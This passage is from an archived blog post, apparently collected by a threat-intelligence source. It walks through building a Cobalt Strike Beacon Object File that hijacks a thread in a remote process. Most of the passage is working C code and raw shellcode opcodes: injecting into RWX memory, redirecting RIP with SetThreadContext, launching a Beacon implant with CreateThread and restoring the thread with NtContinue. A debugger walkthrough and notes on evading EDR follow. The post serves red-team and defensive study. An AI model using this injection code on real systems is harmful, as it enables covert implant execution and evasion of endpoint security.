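    // REX prefix: 0x48 sets REX.W (64-bit operand); REX.B (0x01) selects R8-R15
    buf[n++] = (uint8_t)(0x48 | (reg >> 3));
    // Opcode B8+rd: the low 3 bits of the register number are added to 0xB8
    buf[n++] = (uint8_t)(0xB8 + (reg & 7));

    // The 64-bit immediate follows, least significant byte first
    for (int k = 0; k < 8; k++)
    {
        buf[n++] = (uint8_t)(imm >> (8 * k));
    }
    return n;
}
```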
The next goal is to move the address of CreateThread into RAX. After this, we will perform a\r\ncall rax instruction, which will kick off the routine. This can be seen below.\r\n// mov rax, CreateThread\r\ncreateThread[z++] = 0x48;\r\ncreateThread[z++] = 0xb8;\r\nmycopy(createThread + z, \u0026createthreadAddress, sizeof(createthreadAddress));\r\nz += sizeof(createthreadAddress);\r\n// call rax (call CreateThread)\r\ncreateThread[z++] = 0xff;\r\ncreateThread[z++] = 0xd0;\r\nAdditionally, we want to add a ret opcode. The way our full payload will be set up is as follows:\r\n1. A call to the stack alignment/CreateThread routine will be made first (the stack alignment routine will\r\nbe covered in a later portion of this blog). When a call instruction is executed, it pushes a return address\r\nonto the stack. This is the address that ret will jump to in order to continue execution of the payload.\r\nHere, the return address pushed by the call to the stack alignment/CreateThread routine will be the address of the\r\ninstruction that follows that call inside the NtContinue routine.\r\n2. We want to end our stack alignment/CreateThread routine with a ret instruction. This ret will force\r\nexecution back to the NtContinue routine. This will all be outlined when execution is examined inside of\r\nWinDbg.\r\n3. The call to the stack alignment/CreateThread routine is actually going to be a part of the NtContinue\r\nroutine. The first instruction in the NtContinue routine will be a call to the stack\r\nalignment/CreateThread shellcode, which will then perform a ret back to the NtContinue routine,\r\nwhere thread execution will be restored. Here is a quick visual.\r\nPAYLOAD = NtContinue shellcode calls stack alignment/CreateThread shellcode -\u003e stack\r\nalignment/CreateThread shellcode executes, placing Beacon in its own local thread.
This shellcode\r\nperforms a return back to the NtContinue shellcode -\u003e NtContinue shellcode finishes executing, which\r\nrestores the thread\r\nIn accordance with our plan, let’s end the CreateThread routine with a 0xc3 opcode, which is a return\r\ninstruction.\r\n// Return to the caller in order to kick off NtContinue routine\r\ncreateThread[z++] = 0xc3;\r\nLet’s continue by developing an NtContinue shellcode routine. After that, we will develop a stack alignment\r\nshellcode in order to ensure the stack pointer is 16-byte aligned when the first call occurs in our final payload.\r\nOnce we have completed both of these routines, we will walk through the entire shellcode inside of the debugger.\r\n“Never in the Field of Human Conflict, Was So Much Owed, by So Many, to NtContinue”\r\nUp until now, we have achieved the following:\r\n1. Our shellcode has been injected into the remote process.\r\n2. We have identified a remote thread, which we will later manipulate to execute our Beacon implant.\r\n3. We have created a routine that will place the Beacon implant in its own local thread, within the remote\r\nprocess, upon execution.\r\nThis is great, and we are almost home free. One issue remains, however: thread restoration. After all,\r\nwe are taking a thread, which was performing some sort of action before, unbeknownst to us, and forcing it to do\r\nsomething else. This will certainly result in execution of our shellcode; however, it will also present some\r\nunintended consequences. Upon executing our shellcode, the thread’s CPU registers, along with other information,\r\nwill be out of context from the actions it was performing before execution. This will most likely cause the process housing\r\nthis thread, the desired remote process we are injecting into, to crash. To avoid this, we can utilize an\r\nundocumented ntdll.dll function, NtContinue.
As pointed out in Alex Ionescu and Yarden Shafir’s R.I.P ROP: CET Internals in Windows 20H1 blog post, NtContinue is used to resume execution after an exception or\r\ninterrupt. This is perfect for our use case, as we can abuse this functionality. Since our thread will be mangled,\r\ncalling this function with the preserved CONTEXT record from earlier will restore execution properly.\r\nNtContinue accepts a pointer to a CONTEXT record, and a parameter that allows a programmer to set whether the\r\nAlerted state should be removed from the thread, as outlined in its function prototype. We need not worry about\r\nthe second parameter for our purposes, as we will set this parameter to FALSE. However, there remains the issue\r\nof the first parameter, PCONTEXT.\r\nAs you may recall from the earlier portion of this blog post, we first preserved the CONTEXT record for our hijacked\r\nthread, within our BOF code. The issue we have, however, is that this CONTEXT record is sitting within the current\r\nprocess, while our shellcode will be executed within the desired remote process. Because each user\r\nmode process has its own private address space, this CONTEXT record’s address is not visible to the remote\r\nprocess we are injecting into. Additionally, since NtContinue does not accept a HANDLE parameter, it always resumes\r\nthe current calling thread, which will be the hijacked thread in the remote process. This\r\nmeans we will need to embed the CONTEXT record into our final payload that will be injected into the remote\r\nprocess. For the same reason, the call to NtContinue itself must be made from shellcode embedded in the final payload that will be placed into the remote process. That way, when the\r\nhijacked thread executes the NtContinue routine, restoration of the hijacked thread will occur, since it is the\r\ncalling thread.
With that said, let’s get into developing the routine.\r\nAs with our CreateThread routine, let’s create a 64-byte buffer and a new counter.\r\nBYTE ntContinue[64] = { 0 };\r\nint i = 0;\r\nAs mentioned earlier, this NtContinue routine is going to be the piece of code that actually invokes the\r\nCreateThread routine. When this NtContinue routine performs the call to the CreateThread routine, it will\r\npush a return address onto the stack, which will be the address of the next instruction within this NtContinue shellcode. When the\r\nCreateThread shellcode performs its return, execution will pick back up inside of the NtContinue shellcode.\r\nThe first goal, then, is to start off the NtContinue routine with a call to the CreateThread routine. To do this, we first\r\nneed to calculate the distance from this call instruction to the location of the CreateThread shellcode. In order to\r\nproperly do this, we need to take one thing into consideration: we also need to carry the preserved\r\nCONTEXT record with us, for use in the NtContinue call, and it will sit between the two routines. This is where a relative near call comes in. A relative near\r\ncall (opcode 0xe8) does not call an absolute address, like the address of a Windows API function, for instance.\r\nInstead, it calls a location relative to the instruction pointer.\r\nEssentially, if we can calculate the distance, as a DWORD, to the CreateThread routine, we can just emit the\r\nopcode 0xe8, followed by a DWORD representing the distance from the current memory location, in order to\r\ndynamically call the CreateThread routine!
The reason we are using a DWORD, which is a 32-bit value, is\r\nbecause in 64-bit mode the 0xe8 call encodes its target as a signed 32-bit displacement (16-bit displacements\r\nare not supported in 64-bit mode). The processor sign extends this 32-bit value to 64 bits and adds it to the address of the instruction following the call. More information\r\non the different calling mechanisms on x86_64 systems can be found here. The offset to our shellcode will be the\r\nsize of our NtContinue routine plus the size of a CONTEXT record. This essentially will “jump over” the\r\nNtContinue code and the CONTEXT record, in order to first execute the CreateThread routine. The\r\ncorresponding instructions we need are as follows.\r\n// First calculate the size of a CONTEXT record and NtContinue routine\r\n// Then, \"jump over shellcode\" by calling the buffer at an offset of the calculation (64 bytes + CONTEXT size)\r\n// 0xe8 is a near call, which uses RIP as the base address for RVA calculations and dynamically adds the offset\r\nntContinue[i++] = 0xe8;\r\n// Subtracting to compensate for the near call opcode (represented by i) and the DWORD used for relative address\r\nDWORD shellcodeOffset = sizeof(ntContinue) + sizeof(CONTEXT) - sizeof(DWORD) - i;\r\nmycopy(ntContinue + i, \u0026shellcodeOffset, sizeof(shellcodeOffset));\r\n// Update counter with location buffer can be written to\r\ni += sizeof(shellcodeOffset);\r\nAlthough the above code mostly mirrors what was described above, you can see that the size of a DWORD and the\r\nvalue of i are subtracted from the offset previously mentioned. This is because the whole NtContinue routine\r\nis 64 bytes, and by the time the code has finished executing the entire call instruction, a few things will have\r\nhappened. The first being that the call opcode itself, 0xe8, will have been consumed. This takes us from being at\r\nthe beginning of our routine, byte 1/64, to the second byte in our routine, byte 2/64.
The CreateThread routine,\r\nwhich we need to call, is now one byte closer than when we started - and this will affect our calculations. In the\r\nabove set of instructions, this byte has been compensated for by subtracting the already written opcode (the\r\ncurrent value of i). Additionally, four bytes are taken up by the actual offset itself, a DWORD, which is a 4-byte\r\nvalue. This means execution will now be at byte 6/64 (one byte for the opcode and four bytes for the DWORD, counting from byte 1/64). To\r\ncompensate for this, the size of a DWORD has been subtracted from the total offset. If you think about it, this\r\nmakes sense: the processor measures the displacement from the end of the five-byte call instruction, so by the time the call has finished executing, the CreateThread routine will be five bytes closer. If\r\nwe used the original offset, we would have overshot the CreateThread routine by five bytes. Finally, we\r\nupdate the i counter variable to record how many bytes we have written to the overall NtContinue routine.\r\nWe will walk through all of these instructions inside of the debugger, once we have finished developing this small\r\nshellcode routine.\r\nAt this point, the NtContinue routine would have called the CreateThread routine. The CreateThread routine\r\nwould have returned execution back to the NtContinue routine, and the next instructions in the NtContinue\r\nroutine would execute.\r\nThe next few instructions are a bit of a “hacky” method to pass the first parameter, a pointer to our CONTEXT\r\nrecord, to the NtContinue function. We will use a call/pop routine, which is a well-documented technique and\r\ncan be read about here and here. As we know, we are required to place the first argument into the\r\nRCX register, per the x64 __fastcall calling convention. This means we need to calculate the address of the\r\nCONTEXT record somehow.
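Before moving on to the call/pop trick, the displacement arithmetic for the first call can be checked in isolation. In the following sketch (near_call_rel32 is a hypothetical name), the displacement is the target offset minus the offset of the instruction after the call, which is exactly what subtracting the opcode byte (i) and sizeof(DWORD) achieves in the code above. The test values assume sizeof(CONTEXT) is 0x4D0 bytes, its size on x64, which places the stack alignment routine at offset 0x510; that is consistent with the call target seen later in the WinDbg walkthrough.

```c
#include <assert.h>
#include <stdint.h>

// A relative near call is 5 bytes: opcode 0xE8 plus a 4-byte displacement
#define NEAR_CALL_LEN 5

// Hypothetical helper: computes the rel32 displacement for an 0xE8 call that
// starts at call_off and should land on target_off (offsets within one buffer).
// The CPU adds the displacement to the address of the instruction that follows
// the call, i.e. call_off + NEAR_CALL_LEN.
int32_t near_call_rel32(int64_t call_off, int64_t target_off)
{
    int64_t rel = target_off - (call_off + NEAR_CALL_LEN);

    // The displacement must fit in a signed 32-bit value
    assert(rel >= INT32_MIN && rel <= INT32_MAX);
    return (int32_t)rel;
}
```

The second case in the checks, a call at offset 5 targeting offset 10, yields a displacement of 0: a call that simply lands on the instruction immediately following it, which is the building block of the call/pop technique.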
To calculate that address, we use another near call instruction, this time with a displacement of 0, which calls the byte immediately\r\nfollowing the call instruction.\r\n// Near call instruction to call the address directly after, which is used to pop the pushed return address ont\r\nntContinue[i++] = 0xe8;\r\nntContinue[i++] = 0x00;\r\nntContinue[i++] = 0x00;\r\nntContinue[i++] = 0x00;\r\nntContinue[i++] = 0x00;\r\nThis call therefore lands on the very next instruction, a pop\r\nrcx instruction that we add ourselves. Additionally, the value of i at this point is saved into a new variable called\r\ncontextOffset.\r\n// The previous call instruction pushes a return address onto the stack\r\n// The return address will be the address, in memory, of the upcoming pop rcx instruction\r\n// Since current execution is no longer at the beginning of the ntContinue routine, the distance to the CONTEXT\r\n// The address of the pop rcx instruction will be used as the base for RVA calculations to determine the distanc\r\n// Obtaining the current amount of bytes executed thus far\r\nint contextOffset = i;\r\n// __fastcall calling convention\r\n// NtContinue requires a pointer to a context record and an alert state (FALSE in this case)\r\n// pop rcx (get the return address, which is not needed for returning, into RCX for RVA calculations)\r\nntContinue[i++] = 0x59;\r\nThe purpose of this is that the call instruction pushes the address of the pop rcx instruction onto the stack as\r\nits return address. Since the instruction directly after the call is pop rcx, it pops the\r\nvalue at RSP (the address of the pop rcx instruction itself, pushed by call POP_RCX_INSTRUCTION) into the RCX register.
This helps us, as now we have a memory address that is relatively\r\nclose to the CONTEXT record, which will be located directly after the 64-byte NtContinue routine.\r\nNow, as we know, the original offset of the CONTEXT record from the very beginning of the entire NtContinue\r\nroutine is 64 bytes. This is because we will copy the CONTEXT record directly after the 64-byte BYTE array,\r\nntContinue, in our final buffer. Right now, however, if we add 64 bytes to the value in RCX, we will\r\novershoot the CONTEXT record’s address. This is because RCX holds the address of the pop rcx instruction, which sits partway into the 64-byte\r\nshellcode, meaning we are now closer to the CONTEXT record than we were when we started. To compensate for\r\nthis, we can add the original 64-byte offset to the RCX register, minus the contextOffset value,\r\nwhich represents the number of bytes preceding the pop rcx instruction. This will give us the correct distance\r\nfrom our current location to the CONTEXT record.\r\n// The address of the pop rcx instruction is now in RCX\r\n// Adding the distance between the CONTEXT record and the current address in RCX\r\n// add rcx, distance to CONTEXT record\r\nntContinue[i++] = 0x48;\r\nntContinue[i++] = 0x83;\r\nntContinue[i++] = 0xc1;\r\n// Value to be added to RCX\r\n// The distance between the value in RCX (address of the 'pop rcx' instruction) and the CONTEXT record can be fo\r\nntContinue[i++] = sizeof(ntContinue) - contextOffset;\r\nThis will place the address of the CONTEXT record into the RCX register. If this doesn’t compute, don’t worry. In\r\na brief moment, we will step through everything inside of WinDbg to visually put things together.\r\nThe next goal is to set the RaiseAlert function argument to FALSE, which is a value of 0.
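Before moving on to RaiseAlert, the add rcx immediate can be double-checked. Two 5-byte near calls precede the pop rcx instruction, so contextOffset is 10 and the byte written is 64 - 10 = 54 (0x36), the same value used with .cxr in the debugger walkthrough. The following sketch (context_rcx_adjust is a hypothetical name) also makes explicit a constraint the code above relies on implicitly: add rcx, imm8 (48 83 C1 ib) sign-extends its immediate, so the forward distance has to stay at or below 127.

```c
#include <assert.h>
#include <stdint.h>

// Hypothetical helper mirroring the call/pop bookkeeping: stub_size is the size
// of the routine that precedes the CONTEXT record (64 here) and pop_rcx_off is
// the offset of the pop rcx instruction inside it (contextOffset in the post).
// Returns the immediate for add rcx, imm8 (encoded as 48 83 C1 ib).
int8_t context_rcx_adjust(int stub_size, int pop_rcx_off)
{
    int distance = stub_size - pop_rcx_off;

    // The imm8 is sign-extended by the CPU, so a forward distance above 127
    // would be read as a negative number and cannot be encoded this way
    assert(distance >= 0 && distance <= INT8_MAX);
    return (int8_t)distance;
}
```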
To set RaiseAlert to FALSE, we will again\r\nuse bitwise XOR.\r\n// xor rdx, rdx\r\n// Set to FALSE\r\nntContinue[i++] = 0x48;\r\nntContinue[i++] = 0x31;\r\nntContinue[i++] = 0xd2;\r\nAll that is left now is to call NtContinue! Again, just like our call to CreateThread, we can resolve the address\r\nof the API inside of the current process and pass the return value to the remote process: even though each\r\nprocess is mapped its own view of the Windows DLLs, ntdll.dll is loaded at the same address in every process.\r\nThe mov rax opcode bytes are written first.\r\n// Place NtContinue into RAX\r\nntContinue[i++] = 0x48;\r\nntContinue[i++] = 0xb8;\r\nWe then resolve the address of NtContinue, Beacon Object File style.\r\n// Although the thread is in a remote process, the Windows DLLs mapped to the Beacon process, although private,\r\nunsigned long long ntcontinueAddress = KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA(\"ntdll\"), \"NtContinue\")\r\n// Error handling. If NtContinue cannot be resolved, abort\r\nif (ntcontinueAddress == NULL)\r\n{\r\n BeaconPrintf(CALLBACK_ERROR, \"Error!
Unable to resolve NtContinue. Error: 0x%lx\\n\", KERNEL32$GetLastError());\r\n}\r\nUsing the custom mycopy function, we can then copy the address of NtContinue to the correct index within the\r\nBYTE array, based on the value of i.\r\n// Copy the NtContinue function address to the NtContinue routine buffer\r\nmycopy(ntContinue + i, \u0026ntcontinueAddress, sizeof(ntcontinueAddress));\r\n// Update the counter with the correct offset the next bytes should be written to\r\ni += sizeof(ntcontinueAddress);\r\nAt this point, things are as easy as allocating 0x20 bytes of stack space (the shadow space the x64 calling convention\r\nexpects the caller to provide) and calling the value in RAX, NtContinue!\r\n// Allocate some space on the stack for the call to NtContinue\r\n// sub rsp, 0x20\r\nntContinue[i++] = 0x48;\r\nntContinue[i++] = 0x83;\r\nntContinue[i++] = 0xec;\r\nntContinue[i++] = 0x20;\r\n// call NtContinue\r\nntContinue[i++] = 0xff;\r\nntContinue[i++] = 0xd0;\r\nAll that is left now is the stack alignment routine that runs before the CreateThread routine!
This alignment ensures\r\nthe stack pointer is 16-byte aligned inside the CreateThread routine, which is entered via the call from the NtContinue routine.\r\nWill The Stars Align?\r\nThe following routine performs a bitwise AND on the stack pointer, clearing its last 4 bits to ensure a 16-byte aligned RSP value\r\ninside of the CreateThread routine.\r\n// Create 4 byte buffer to perform bitwise AND with RSP to ensure 16-byte aligned stack for the call to shellco\r\n// and rsp, 0FFFFFFFFFFFFFFF0\r\nstackAlignment[0] = 0x48;\r\nstackAlignment[1] = 0x83;\r\nstackAlignment[2] = 0xe4;\r\nstackAlignment[3] = 0xf0;\r\nAfter the stack alignment is completed, all that is left to do is invoke malloc to create a large buffer that will\r\ncontain all of our custom routines, inject the final buffer, and call SetThreadContext and ResumeThread to\r\nqueue execution!\r\n// Allocating memory for final buffer\r\n// Size of NtContinue routine, CONTEXT structure, stack alignment routine, and CreateThread routine\r\nPVOID shellcodeFinal = (PVOID)MSVCRT$malloc(sizeof(ntContinue) + sizeof(CONTEXT) + sizeof(stackAlignment) + size\r\n// Copy NtContinue routine to final buffer\r\nmycopy(shellcodeFinal, ntContinue, sizeof(ntContinue));\r\n// Copying CONTEXT structure, stack alignment routine, and CreateThread routine to the final buffer\r\n// Allocation is already a pointer (PVOID) - casting to a DWORD64 type, a 64-bit address, in order to write to t\r\n// Using RtlMoveMemory for the CONTEXT structure to avoid casting to something other than a CONTEXT structure\r\nNTDLL$RtlMoveMemory((DWORD64)shellcodeFinal + sizeof(ntContinue), \u0026cpuRegisters, sizeof(CONTEXT));\r\nmycopy((DWORD64)shellcodeFinal + sizeof(ntContinue) + sizeof(CONTEXT), stackAlignment, sizeof(stackAlignment));\r\nmycopy((DWORD64)shellcodeFinal + sizeof(ntContinue) + sizeof(CONTEXT) + sizeof(stackAlignment), createThread, si\r\n// 
Declare a variable to represent the final length\r\nint finalLength = (int)sizeof(ntContinue) + (int)sizeof(CONTEXT) + sizeof(stackAlignment) + sizeof(createThread)\r\nBefore moving on, notice the call to RtlMoveMemory when it comes to copying the CONTEXT record to the buffer.\r\nThis is due to mycopy being prototyped to access the source and destination buffers as char* data types.\r\nRtlMoveMemory, however, is prototyped to accept VOID UNALIGNED pointers, meaning pretty much\r\nany pointer type can be passed, which is perfect for us as CONTEXT is a structure, not a char*.\r\nThe above code allocates a buffer large enough for all of our routines and copies each one in at the correct offset,\r\nwith the NtContinue routine being copied first, followed by the preserved CONTEXT record of the hijacked\r\nthread, the stack alignment routine, and the CreateThread routine. After this, the shellcode is injected into the\r\nremote process.\r\nFirst, VirtualAllocEx is called again.\r\n// Inject the shellcode into the target process with read/write/execute permissions\r\nPVOID allocateMemory = KERNEL32$VirtualAllocEx(\r\n processHandle,\r\n NULL,\r\n finalLength,\r\n MEM_RESERVE | MEM_COMMIT,\r\n PAGE_EXECUTE_READWRITE\r\n);\r\nif (allocateMemory == NULL)\r\n{\r\n BeaconPrintf(CALLBACK_ERROR, \"Error! Unable to allocate memory in the remote process. Error: 0x%lx\\n\", KERNEL3\r\n}\r\nSecondly, WriteProcessMemory is called to write the shellcode to the allocation.\r\n// Write shellcode to the new allocation\r\nBOOL writeMemory = KERNEL32$WriteProcessMemory(\r\n processHandle,\r\n allocateMemory,\r\n shellcodeFinal,\r\n finalLength,\r\n NULL\r\n);\r\nif (!writeMemory)\r\n{\r\n BeaconPrintf(CALLBACK_ERROR, \"Error! Unable to write memory to the buffer. Error: 0x%llx\\n\", KERNEL32$GetLastE\r\n}\r\nAfter that, RSP and RIP are set before the call to SetThreadContext.
RIP will point to our final buffer, so once the\r\nthread resumes, execution will begin at our payload.\r\n// Allocate stack space by subtracting the stack by 0x2000 bytes\r\ncpuRegisters.Rsp -= 0x2000;\r\n// Change RIP to point to our shellcode and typecast buffer to a DWORD64 because that is what a CONTEXT structur\r\ncpuRegisters.Rip = (DWORD64)allocateMemory;\r\nNotice that 0x2000 bytes are subtracted from RSP. @zerosum0x0’s blog post on ThreadContinue uses the same\r\ntrick to give the injected code breathing room on the stack, away from the hijacked thread’s existing stack data, and I decided to adopt it as well in order\r\nto avoid heavy troubleshooting.\r\nAfter that, all that is left to do is to invoke SetThreadContext, ResumeThread, and free!\r\nSetThreadContext\r\n// Set RIP\r\nBOOL setRip = KERNEL32$SetThreadContext(\r\n desiredThread,\r\n \u0026cpuRegisters\r\n);\r\n// Error handling\r\nif (!setRip)\r\n{\r\n BeaconPrintf(CALLBACK_ERROR, \"Error! Unable to set the target thread's RIP register. Error: 0x%lx\\n\", KERNEL32\r\n}\r\nResumeThread\r\n// Call to ResumeThread()\r\nDWORD resume = KERNEL32$ResumeThread(\r\n desiredThread\r\n);\r\nfree\r\n// Free the buffer used for the whole payload\r\nMSVCRT$free(\r\n shellcodeFinal\r\n);\r\nAdditionally, you should always clean up handles in your code - but especially in Beacon Object Files, as they are\r\n“sensitive”.\r\n// Close handle\r\nKERNEL32$CloseHandle(\r\n desiredThread\r\n);\r\n// Close handle\r\nKERNEL32$CloseHandle(\r\n processHandle\r\n);\r\nDebugger Time\r\nLet’s use an instance of notepad.exe as our target process and attach to it in WinDbg.\r\nThe PID we want to inject into is 7548 for our purposes.
After loading our Aggressor Script developed earlier,\r\nwe can use the command cThreadHijack 7548 TESTING, where TESTING is the name of the HTTP listener\r\nBeacon will interact with.\r\nThere we go, our BOF successfully ran. Now, let’s examine what we are working with in WinDbg. As we can see,\r\nthe address of our final buffer is shown in the Current RIP: 0x1f027f20000 output line. Let’s view this in\r\nWinDbg.\r\nGreat! Everything seems to be in place. As is shown in the mov rax,offset ntdll!NtContinue instruction, we\r\ncan see our NtContinue routine. The beginning of the NtContinue routine should call the address of the stack\r\nalignment and CreateThread shellcode, as mentioned earlier in this blog post. Let’s see what is at the address being called,\r\n0x000001f027f20510 (an offset of 0x510 from our buffer: 64 bytes for the NtContinue routine plus 0x4D0 bytes for the x64 CONTEXT record).\r\nPerfect! As we can see by the and rsp, 0FFFFFFFFFFFFFFF0 instruction, along with the address of\r\nKERNEL32!CreateThreadStub, the NtContinue routine will first call the stack alignment and CreateThread\r\nroutines. In this case, we are good to go! Let’s now walk through execution of the code.\r\nOnce ResumeThread lets the hijacked thread run with the RIP value we set via SetThreadContext, we can see that\r\nexecution has reached the first call, which will invoke the stack alignment and CreateThread routines.\r\nStepping through this call, as we know, will push a return address onto the stack. As mentioned previously, this\r\nwill be the address of the next instruction, call 0x000001f027f2000a. When the CreateThread routine returns,\r\nit will return to this address. After stepping through the instruction, we can see that the address of the next call\r\nis pushed onto the stack.\r\nExecution then reaches the bitwise AND instruction.
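Conceptually, this instruction rounds RSP down to the nearest multiple of 16. Its encoding, 48 83 E4 F0, carries only the single byte 0xF0, which the processor sign-extends to 0xFFFFFFFFFFFFFFF0 before performing the AND. The following sketch models both steps with hypothetical helper names; note that when RSP is already aligned, the AND leaves it unchanged.

```c
#include <assert.h>
#include <stdint.h>

// Models how the CPU widens an 8-bit immediate: if bit 7 is set, the upper
// 56 bits are filled with ones; otherwise they are zero.
uint64_t sign_extend_imm8(uint8_t imm8)
{
    return (imm8 & 0x80) ? (0xFFFFFFFFFFFFFF00ULL | imm8) : (uint64_t)imm8;
}

// Hypothetical helper modelling and rsp, 0xFFFFFFFFFFFFFFF0 (48 83 E4 F0):
// clears the low 4 bits, rounding the value down to a multiple of 16.
uint64_t align_stack_down(uint64_t rsp)
{
    uint64_t mask = sign_extend_imm8(0xF0);
    assert(mask == 0xFFFFFFFFFFFFFFF0ULL);
    return rsp & mask;
}
```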
In this case, and rsp,\r\n0FFFFFFFFFFFFFFF0 turns out to be redundant, as the stack pointer is already 16-byte aligned (its last 4 bits are already set to\r\n0). Stepping through the bitwise XOR operations, RCX and RDX are set to 0.\r\nAs we know from the CreateThread prototype, the lpStartAddress parameter is a pointer to the code the new thread will run, which in our case is our Beacon shellcode.\r\nIn WinDbg, we can see the third argument, which will be loaded into R8, is 0x1f027ee0000. Unassembling this address in the debugger discloses this is our Beacon implant, which was injected earlier! To\r\nverify this, you can generate a raw Beacon stageless artifact in Cobalt Strike manually and run it through\r\nhexdump to verify the first few opcodes correspond.\r\nAfter stepping through the instruction, the value is loaded into the R8 register. The next instruction sets R9 to 0 via\r\nxor r9, r9.\r\nAdditionally, [RSP + 0x20] and [RSP + 0x28] are set to 0 by copying the value of R9, which is now 0, to these\r\nlocations. Here is what [RSP + 0x20] and [RSP + 0x28] look like before the mov [rsp + 0x20], r9 and mov\r\n[rsp + 0x28], r9 instructions and after.\r\nNext, CreateThread is placed into RAX and called. Note that the symbol shown is actually CreateThreadStub. This\r\nis because the implementations of most former kernel32.dll functions were moved to a DLL called KERNELBASE.dll.
These “stub”\r\nfunctions essentially just redirect execution to the correct KERNELBASE.dll function.\r\nStepping over the function with p in WinDbg places the CreateThread return value into RAX: a\r\nhandle to the new local thread running the Beacon implant.\r\nAfter execution of our NtContinue routine is complete, we will receive the Beacon callback as a result of this\r\nthread.\r\nAdditionally, we can see that RSP now points to the return address pushed earlier, which is the address of the first “real” instruction of our NtContinue routine. A ret\r\ninstruction, which is what RIP currently points to, pops the value RSP points to into RIP. Executing the\r\nreturn redirects execution back to the NtContinue routine.\r\nAs we can see, the next call instruction calls the pop rcx instruction. This call\r\ninstruction, when executed, will push the address of the pop rcx instruction onto the stack as a return address.\r\nExecuting the pop rcx instruction, we can see that RCX now contains the address, in memory, of the pop rcx\r\ninstruction. This will be the base address used in the RVA calculations to resolve the address of the preserved\r\nCONTEXT record.\r\nTo verify that our offset is correct, we can use .cxr in WinDbg to check whether the contiguous memory block located\r\nat RCX + 0x36 is in fact a CONTEXT record. 0x36 is chosen because it is the value about to be\r\nadded to RCX: the pop rcx instruction sits 10 bytes into the 64-byte NtContinue routine (two 5-byte calls precede it), and 64 - 10 = 54, or 0x36.
Verifying with WinDbg, we can see this is the case.\r\nHad this not been the correct location of the CONTEXT record, .cxr would not have been able to parse the memory block as a valid CONTEXT record.\r\nNow that we have verified our CONTEXT record is in the correct place, we can execute the add rcx instruction, which adds the correct distance and leaves a pointer to the CONTEXT record in RCX, fulfilling the PCONTEXT\r\nparameter of NtContinue.\r\nStepping through xor rdx, rdx, which sets the RaiseAlert parameter of NtContinue to FALSE, execution\r\nlands on the call rax instruction, which will call NtContinue.\r\nPressing g in the debugger then shows quite a few DLLs being mapped into notepad.exe.\r\nThis is the Beacon implant resolving needed DLLs for various function calls - meaning our Beacon implant has\r\nbeen executed! If we go back into Cobalt Strike, we can see we now have a Beacon in the context of notepad.exe\r\nwith the same PID of 7548!\r\nAdditionally, you will notice on the victim machine that notepad.exe is fully functional! We have successfully\r\nforced a remote thread to execute our payload and restored it, all in one go.\r\nFinal Thoughts\r\nObviously, this technique isn’t without its flaws. There are still IOCs for this technique, including invoking\r\nSetThreadContext, amongst other things. However, this does avoid invoking any sort of action that creates a\r\nremote thread, which is still useful in most situations.
This technique could be taken further, perhaps by\r\ninvoking direct system calls instead of these APIs, which are susceptible to hooking by most EDR\r\nproducts.\r\nAdditionally, one thing to note is that since this technique suspends a thread and then resumes it, you may have to\r\nwait anywhere from a few moments to a few minutes for the thread to get around to executing. Interacting with the\r\nprocess directly will force execution, and targeting Windows processes whose threads execute frequently also helps\r\navoid long waits.\r\nI had a lot of fun implementing this technique into a BOF and I am really glad I have a reason to write more C\r\ncode! Like always: peace, love, and positivity :-).\r\nSource: https://connormcgarr.github.io/thread-hijacking/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://connormcgarr.github.io/thread-hijacking/"
	],
	"report_names": [
		"thread-hijacking"
	],
	"threat_actors": [],
	"ts_created_at": 1775791323,
	"ts_updated_at": 1775791339,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/22a337a7e2a698b3935b38a27b5fe1eeac6b1f7f.pdf",
		"text": "https://archive.orkl.eu/22a337a7e2a698b3935b38a27b5fe1eeac6b1f7f.txt",
		"img": "https://archive.orkl.eu/22a337a7e2a698b3935b38a27b5fe1eeac6b1f7f.jpg"
	}
}